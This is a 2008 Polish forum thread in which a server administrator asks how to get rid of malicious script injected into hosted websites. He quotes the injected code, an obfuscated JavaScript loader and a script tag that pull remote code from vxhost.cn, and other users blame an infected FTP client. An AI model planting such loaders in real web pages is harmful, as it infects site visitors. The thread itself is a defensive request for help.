- Pokrewne
Kopia RPS2-->inne RPS2- Re: [SPAM] Wiertła i inne akcesoria do PCB - PROMOCJA
- skad ledy "pirania" czy tam inne superfluxy kwadratowe
- jak mogę usun±ć logo/napis "jportal" z nagłówka
- jak usun±ć żywicę któr± zalano układ elektroniczny
- Problem z rejestracj± użytkowników i inne..
- Dlaczego j±dro systemu jest inne niż w dystrybucji ?
- Unique vs inne transpondery
- adresy msql i inne
- zmiana loginu lub "jak usun±ć konto?"
Trojan/inne dziadostwo- jak to usunac
koliber2 - 09-12-2008 23:57
Trojan/inne dziadostwo- jak to usunac
Witajcie,
Moze ktos mi pomoze bo juz sam nie wiem co z tym zrobic. Na paru stronach na moich serwerach cos/ktos wkleja w kod strony kod:
Cytat:
<script type="text/javascript">
var gaJsHost = (unescape('\u0076\u0078\u0068\u006f\u0073\u0074\u0 02e\u0063\u006e\u002f'));
document.write('<scr'+'ipt type="text/javascript" src="http://'+gaJsHost+'google.com"></scr'+'ipt>');
</script> lub
Cytat:
<script type="text/javascript" src="http://vxhost.cn/google.js"></script> co powoduje tyle ze google banuje te strony ze wzgledu na wykryty trojan. Pojecia nie mam jak tego sie pozbyc i jaka jest droga wchodzenia tego na strone usera. Serwer zabezpieczony jest poprawnie.. podejrzewam ze jest to jakis bug w skrypcie ktory uzywaja ci userzy lub tez ci webmasterzy maja wirusa na kompie i sie on wgrywa przy polaczeniu ftp. Na kazdym servie jest mod_security,rkhunter, skanery antywirusowe itd..
Dzieki z gory za sugestie
jjgger - 10-12-2008 02:23
Używasz Total commandera do przesyłania plików? jeżeli tak to znany jest z tego (wirusik), iż dokleja kod do przesyłanych plików.
koliber2 - 10-12-2008 10:12
Z tego co wyczytalemna innych forach wynika ze to jest znany wirus szczegolnie lubiacy coppermine ale nie tylko. Nic, bede musial chyba zakazac uzywania total commandera + upgrade wersji skryptow do najnowszych. Innego wyjscia chyba nie ma..
Copyright by Rektor PWr Wita. Analiza, Algebra, Fizyka, Informatyka – Postawy ...
Design by flankerds.com